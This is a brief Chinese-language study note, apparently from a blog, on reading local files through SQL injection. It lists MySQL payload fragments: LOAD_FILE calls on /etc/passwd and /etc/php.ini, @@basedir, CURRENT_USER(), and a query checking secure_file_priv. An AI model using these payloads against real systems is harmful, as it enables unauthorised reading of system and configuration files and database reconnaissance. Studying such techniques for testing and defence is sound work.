跳至主要内容

SQL Injection LFI Success

學到的東西

LOAD_FILE('/etc/passwd')
LOAD_FILE('/etc/php.ini')
@@basedir
CURRENT_USER()
SELECT variable_value FROM information_schema.global_variables WHERE variable_name = 'secure_file_priv'